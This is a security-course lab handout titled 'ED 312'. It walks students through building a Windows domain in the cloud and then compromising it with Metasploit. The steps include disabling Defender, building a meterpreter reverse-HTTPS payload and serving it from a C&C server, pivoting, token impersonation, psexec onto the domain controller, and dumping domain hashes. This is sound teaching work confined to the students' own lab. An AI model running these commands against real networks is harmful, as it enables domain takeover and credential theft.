ED 312: Exploiting a Windows Domain (30 pts)

What You Need for this Project

Purpose

To prepare an environment like that used in real enterprises, appropriate for security projects.

Task 1: Making a Domain Controller

Making a Windows 2016 Server

Create a cloud server, as shown below.

From the Google Cloud Console, set the password for your domain controller. Connect to it via RDP.

Adding the "Active Directory Domain Services" Role

In "Server Manager", make these selections:

A progress bar move across the window. When it finishes, it shows a gray message near the top saying "Configuration required". Click Close

Promoting the Server

At the top right of the Server Manager window, click the yellow triangle.

Click "Promote this server to a domain controller", as shown below.

In the "Active Directory Domain Services Configuration Wizard", make these selections:

A red bar appears, saying "One or more prerequisites failed...". In the lower right, the problem is explained: the administrator password does not meet requirements, as shown below,

Assigning an Administrator Password

At the lower left of the desktop, right-click the Start button. Click "Command Prompt (Admin)". In the User Account Control box, click Yes.

In the Administrator Command Prompt window, execute this command:

net user administrator P@ssw0rd123
(You may prefer to choose a more secure password.)

Close the Administrator Command Prompt window.

In the "Active Directory Domain Services Configuration Wizard", on the "Prerequisites Check" page, at the top center, in small blue type, click "Rerun prerequisites check".

Now the check passes, as shown below.

Click Install.

The server installs software and restarts.

Logging In

Connect again via RDP.

Log in with these credentials:

The login process takes several minutes, waiting for the Group Policy Client.

Finding the Domain Controller's IP Address

On your Domain Controller, open a Command Prompt and execute the ipconfig command.

Find your IP address. Make a note of it--you will need it later. When I did it, my IP address was 10.138.0.3.


Task 2: Making a Member Server

Create another Windows cloud server, the same way you created the Domain Controller.

Adjusting the DNS Server

At the lower left of the desktop, right-click the Start button. Click "Network Connections".

In the "Network Connections" window, right-click Ethernet and click Properties.

In the Ethernet Properties box, double-click "Internet Protocol Version 4 (TCP/IPv4)".

In the Internet Protocol Version 4 (TCP/IPv4) Properties window, in the lower section, click the "Use the following DNS server addresses" button.

Enter the IP address of your domain controller, as shown below.

Note: your IP address will be different from my example

Click OK.

Click OK.

Open a Command Prompt and execute this command:

ping hackme.com
You should get replies, as shown below.

Joining the Domain

At the lower left of the desktop, right-click the Start button. Click System.

In the System window, on the left side, click "Advanced system settings".

A System Properties box opens.

In System Properties, click the "Computer Name" tab.

Click the Change... button.

In the "Computer Name/Domain Changes" box, click the Domain button and enter a Domain of HACKME.COM as shown below.

Click OK

A Windows Security box pops up. Enter these credentials:

A box pops up saying "Welcome to the HACKME.COM domain". Click OK.

A box pops up saying "You must restart your machine...". Click OK.

Close all windows and restart your Member Server.

Logging In to the Domain

Connect again to the Member Server via RDP.

Log in with these credentials:

ED 312.1: Recording your Success (15 pts)

In a Command Prompt window, excute this command:
whoami /all
The flag is covered by a green box in the image below.


Task 3: Making the Member Server Vulnerable

Turning off IE Enhanced Security

On the Member Server, in Server Manager, at the top, click "1 Configure this Local Server".

On the right side, set "IE Enhanced Security Configuration" to Off, as shown below.

Turning off Windows Defender Real-Time Protection

Open an Administrator PowerShell window and execute this command:
Set-MpPreference -DisableRealtimeMonitoring $true
At the lower left of the desktop, click the magnifying-glass icon. Search for DEF and click "Windows Defender".

Real-time protection should be off, as shown below.


Task 4: Preparing a C&C Server

Launch your Debian cloud attacker, which should already have Metasploit installed.

Creating Malware with Msfvenom

In Linux, execute these commands to create a malicious Windows executable file named "happy.exe" and serve it from a malicious Web server. It's an executable designed to run as a service.

Adjust the IP address to match the IP address of your Linux machine (the C&C server), which the first command shows you.

ip a
sudo apt install apache2 -y
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=10.142.0.3 -f exe -o /var/www/html/happy.exe
sudo service apache2 start

Starting a Listener

In Linux, execute these commands to listen for incoming connections from compromised targets:
sudo msfconsole -q
use multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
exploit
Metasploit opens a handler, as shown below.


Task 4: Exploiting the Member Server

On the Windows member server, open Internet Explorer and go to this URL, replacing the IP address with the IP address of your Linux C&C server.
http://10.142.0.3/happy.exe
Click Run. IE pops up a box saying "happy.exe is not commonly downloaded and might harm your computer".

Click Actions. Click "More options". Click "Run anyway".

On your Linux C&C server, a meterpreter session opens, as shown below.

At the "meterpreter >" prompt, execute these commands to see who you are and escalate to SYSTEM, as shown below.

(In this case, we were already the Domain Admin, but usually you are a mere domain user, and you need to escalate to System, and then get Domain Admin, so we'll practice that process.)

getuid
getsystem
getuid


Task 5: Pivoting to the Domain Controller

Configuring a Route on the Member Server

On Kali, in the Meterpreter session controlling the Member Server, execute this command:
background
That places the session in the background.

On Kali, in msfconsole, execute these commands:

use post/multi/manage/autoroute
show info
Information appears about the module, as shown below.

On Kali, in msfconsole, execute these commands. Replace the IP address with the IP address of the network containing your Domain Controller.

set SESSION 1
set CMD add
set SUBNET 10.138.0.0
exploit
The module runs, adding a route to the subnet, as shown below.

On Kali, execute these commands to see the routing table.

set CMD print
exploit
The routing table now sends traffic to the subnet through session 1, as shown below.

Scanning the Domain Controller

On Kali, execute these commands to see how Metaspoit's port scanner works.
use auxiliary/scanner/portscan/tcp 
show info
The parameters are explained, as shown below.

On Kali, execute these commands to scan TCP ports 139 and 445 on the Domain Controller.

Replace the IP address with the IP address of your Domain Controller.

set PORTS 139,445
set RHOSTS 10.138.0.3
exploit
The ports are open, because we are pivoting through the Member Server, as shown below.

Exploitation Options

To exploit the domain controller, we could use ETERNALROMANCE again, or pass the hash, but for this project we'll use token theft, just to practice it.

Enumerating Tokens

On Kali, execute these commands to see the privilege tokens available on the Member Server.
sessions -i 1
use incognito
list_tokens -u
A "Delegation Token" is available for "HACKME\Administrator", the Domain Admin, as shown below.

Escalating Privileges to Domain Admin

On Kali, in the Meterpreter session, execute these commands.
impersonate_token HACKME\\Administrator
getuid
You are now a domain administrator, as shown below.

Exploiting the Domain Controller

Im Metasploit, execute these commands.
background
use exploit/windows/local/current_user_psexec
show info
This exploit lets us run code on the domain controller using the token, without a need for a password or hash, as shown below.

At the meterpreter prompt, execute these commands. Use the IP address of your Domain Controller and the session number of your Domain Admin session.

set RHOSTS 10.138.0.3
set SESSION 1
exploit
The session fails, as shown below.

Observing Windows Defender History

To see why, on the Domain Controller, in an RDP session, open Windows Defender.

Look in the History and you can see that the atack was blocked, as shown below.

Turning off Windows Defender Real-Time Protection

On the Domain Controller, open an Administrator PowerShell window and execute this command:
Set-MpPreference -DisableRealtimeMonitoring $true

Exploiting the Domain Controller Again

Im Metasploit, execute this command:
exploit
Now the session opens, as shown below.

Dumping Domain Hashes

In Metasploit, execute these commands.
background
use post/windows/gather/smart_hashdump
show info
This exploit dumps domain hashes, as shown below.

ED 312.2: Recording your Success (15 pts)

In Metasploit, execute these commands. Use the session number of your Domain Controller session.
set GETSYSTEM true
set SESSION 1
exploit
Hashes appear.

The flag is covered by a green box in the image below.


Posted 4-30-19